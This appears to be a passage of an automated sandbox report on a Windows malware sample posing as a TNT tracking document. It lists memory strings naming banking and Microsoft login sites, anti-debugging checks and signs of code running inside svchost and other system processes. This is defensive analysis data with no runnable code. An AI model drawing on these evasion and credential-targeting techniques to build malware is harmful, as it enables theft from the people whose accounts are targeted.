                    Source: w2-0G0-7.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: w2-0G0-7.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: w2-0G0-7.10.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: w2-0G0-7.10.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: mobsync.exe, 0000000A.00000002.3366789394.00000000032F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8%
                    Source: w2-0G0-7.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: w2-0G0-7.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: global block list test formVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: w2-0G0-7.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: bRQIkEscRm.exe, 00000009.00000002.3370076388.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: w2-0G0-7.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: w2-0G0-7.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: w2-0G0-7.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: wscript.exe, 00000004.00000002.2251569105.000001F5E4B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: w2-0G0-7.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: w2-0G0-7.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: w2-0G0-7.10.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: firefox.exe, 0000000C.00000002.2968547157.0000023AF15FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: w2-0G0-7.10.drBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: w2-0G0-7.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: w2-0G0-7.10.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: w2-0G0-7.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: w2-0G0-7.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-103622
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-103438
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E rdtsc 3_2_03B7096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00417713 LdrLoadDll,3_2_00417713
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F33F09 BlockInput,0_2_00F33F09
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EC3B3A
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00EF5A7C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC4B37 LoadLibraryA,GetProcAddress,0_2_00EC4B37
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D3550 mov eax, dword ptr fs:[00000030h]2_2_015D3550
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D35B0 mov eax, dword ptr fs:[00000030h]2_2_015D35B0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D1EA0 mov eax, dword ptr fs:[00000030h]2_2_015D1EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28397 mov eax, dword ptr fs:[00000030h]3_2_03B28397
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E388 mov eax, dword ptr fs:[00000030h]3_2_03B2E388
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5438F mov eax, dword ptr fs:[00000030h]3_2_03B5438F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]3_2_03B4E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B663FF mov eax, dword ptr fs:[00000030h]3_2_03B663FF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B403E9 mov eax, dword ptr fs:[00000030h]3_2_03B403E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE3DB mov eax, dword ptr fs:[00000030h]3_2_03BDE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]3_2_03BD43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD43D4 mov eax, dword ptr fs:[00000030h]3_2_03BD43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC3CD mov eax, dword ptr fs:[00000030h]3_2_03BEC3CD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]3_2_03B3A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B383C0 mov eax, dword ptr fs:[00000030h]3_2_03B383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB63C0 mov eax, dword ptr fs:[00000030h]3_2_03BB63C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0634F mov eax, dword ptr fs:[00000030h]3_2_03C0634F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C310 mov ecx, dword ptr fs:[00000030h]3_2_03B2C310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B50310 mov ecx, dword ptr fs:[00000030h]3_2_03B50310
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A30B mov eax, dword ptr fs:[00000030h]3_2_03B6A30B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD437C mov eax, dword ptr fs:[00000030h]3_2_03BD437C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov ecx, dword ptr fs:[00000030h]3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C08324 mov eax, dword ptr fs:[00000030h]3_2_03C08324
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov ecx, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA352 mov eax, dword ptr fs:[00000030h]3_2_03BFA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD8350 mov ecx, dword ptr fs:[00000030h]3_2_03BD8350
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C062D6 mov eax, dword ptr fs:[00000030h]3_2_03C062D6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]3_2_03B6E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]3_2_03B6E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2823B mov eax, dword ptr fs:[00000030h]3_2_03B2823B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0625D mov eax, dword ptr fs:[00000030h]3_2_03C0625D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2826B mov eax, dword ptr fs:[00000030h]3_2_03B2826B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A250 mov eax, dword ptr fs:[00000030h]3_2_03B2A250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36259 mov eax, dword ptr fs:[00000030h]3_2_03B36259
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]3_2_03BEA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]3_2_03BEA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB8243 mov eax, dword ptr fs:[00000030h]3_2_03BB8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB8243 mov ecx, dword ptr fs:[00000030h]3_2_03BB8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C061E5 mov eax, dword ptr fs:[00000030h]3_2_03C061E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B70185 mov eax, dword ptr fs:[00000030h]3_2_03B70185
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]3_2_03BEC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]3_2_03BEC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]3_2_03BD4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]3_2_03BD4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B601F8 mov eax, dword ptr fs:[00000030h]3_2_03B601F8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]3_2_03BF61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]3_2_03BF61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B60124 mov eax, dword ptr fs:[00000030h]3_2_03B60124
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]3_2_03C04164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]3_2_03C04164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov ecx, dword ptr fs:[00000030h]3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF0115 mov eax, dword ptr fs:[00000030h]3_2_03BF0115
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C156 mov eax, dword ptr fs:[00000030h]3_2_03B2C156
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC8158 mov eax, dword ptr fs:[00000030h]3_2_03BC8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]3_2_03B36154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]3_2_03B36154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov ecx, dword ptr fs:[00000030h]3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF60B8 mov eax, dword ptr fs:[00000030h]3_2_03BF60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]3_2_03BF60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B280A0 mov eax, dword ptr fs:[00000030h]3_2_03B280A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC80A8 mov eax, dword ptr fs:[00000030h]3_2_03BC80A8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3208A mov eax, dword ptr fs:[00000030h]3_2_03B3208A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]3_2_03B2C0F0
